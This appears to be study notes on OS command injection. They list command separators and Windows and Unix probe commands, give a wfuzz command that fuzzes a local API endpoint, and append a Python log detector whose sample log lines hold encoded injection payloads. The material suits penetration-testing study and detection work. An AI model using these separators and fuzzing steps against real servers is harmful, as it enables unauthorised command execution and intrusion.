Uploaded by Kate Chumachenko

osci

Operating System Command Injection
It really helps to know which operating system is running on the target server. Make sure to get the most out of Nmap scans during the reconnaissance stage.
Look for parameters under your control as usual: URL query strings, request parameters, headers, any request that has thrown unique or verbose errors (especially ones containing any operating system information).
Command separators:
|
||
&
&&
'
"
;
'"
Fuzz with two positions: one for the command separator and one for a potential operating system command.
Windows:
ipconfig
dir
ver // prints the operating system and version
echo %CD% // prints the current working directory
whoami
\*nix (Linux and Unix):
ifconfig
ls
uname -a
pwd
whoami
With Wfuzz:
`wfuzz -z file,/home/shiuser/Tools/wordlists/SecLists/Fuzzing/OSCi/command_sep.txt -z file,/home/shiuser/Tools/wordlists/SecLists/Fuzzing/OSCi/os_cmds.txt "http://localhost:8888/api/users/query?=FUZZFUZ2Z"`
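What this two-position fuzzing looks like from the server side, as an added example that is not part of the original notes: a small Python check that flags access-log lines where a query parameter decodes to one of the separators above followed by one of the listed commands. The log lines, the parameter names and the function name `find_probes` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Separators and probe commands copied from the lists above.
SEPARATORS = ["||", "&&", "|", "&", ";", "'", '"']
PROBES = ["ipconfig", "ifconfig", "whoami", "uname", "echo %CD%",
          "dir", "ver", "ls", "pwd"]

_SEP = "|".join(re.escape(s) for s in SEPARATORS)
_CMD = "|".join(re.escape(c) for c in PROBES)
# Separator, optional whitespace, then a probe command not followed by
# a word character (so ";ver" matches but ";version" does not).
PROBE_RE = re.compile(rf"(?:{_SEP})\s*(?:{_CMD})(?![\w-])", re.IGNORECASE)
BARE_RE = re.compile(rf"(?:{_CMD})", re.IGNORECASE)
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def find_probes(log_line):
    """Return (parameter, decoded value) pairs in one access-log line
    that contain a separator followed by a probe command."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    for part in urlsplit(m.group(1)).query.split("&"):
        name, eq, value = part.partition("=")
        if eq:
            decoded = unquote_plus(value)
            if PROBE_RE.search(decoded):
                hits.append((unquote_plus(name), decoded))
        elif BARE_RE.fullmatch(unquote_plus(part)):
            # An unencoded "&whoami" reaches the server as a bare parameter.
            hits.append(("", "&" + unquote_plus(part)))
    return hits


# Constructed sample lines (common log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /api/users/query?name=alice HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /api/users/query?name=alice%3Bwhoami HTTP/1.1" 500 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /api/users/query?name=x%7C%7Cuname+-a HTTP/1.1" 500 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /api/users/query?name=alice&whoami HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:04 +0000] "GET /api/files?sort=dir&order=asc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(find_probes(line))
```

A legitimate parameter named or valued `dir`, as in the last sample line, is not flagged because no separator precedes it inside a decoded value.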